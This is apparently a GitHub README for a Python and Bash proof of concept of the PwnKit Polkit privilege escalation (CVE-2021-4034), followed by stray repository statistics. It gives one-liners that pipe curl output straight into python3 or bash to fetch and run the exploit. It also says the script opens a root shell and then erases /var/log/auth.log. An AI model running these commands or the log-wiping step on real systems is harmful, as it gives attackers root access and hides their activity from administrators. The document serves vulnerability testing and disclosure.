██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
Intro
This is a simple PoC for the newly found Polkit error names PwnKit.
I made it both as bash and python3 script - just for the fun of it.
The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access.
How to run
This scripts are a one shot execution so simply do
python3 pkwner.py
or
bash pkwner.sh
You can also run it directly from a webserver (e.g. this github repo) via:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
or
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In both cases it should look something like this: 
and 
The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not).
Credits
- Qualys for finding the issue and making the info public
- Andris Raugulis for making one of the first PoCs to get inspired from
- MiscGang because misgang@Kalmarunionen are baddass
8 May 03, 2022
58 Dec 05, 2022
125 Dec 09, 2022
16 Mar 24, 2022
826 Jan 01, 2023
8 Feb 24, 2022
635 Dec 20, 2022
4 Aug 08, 2022
24 Dec 19, 2022
81 Dec 23, 2022
2 Jan 24, 2022
1 Nov 12, 2021
247 Jan 02, 2023
4 Apr 16, 2022
18 Jan 23, 2022
40.3k Jan 09, 2023
1 Dec 16, 2021
1 Jan 24, 2022
2 Oct 25, 2022
462 Jan 02, 2023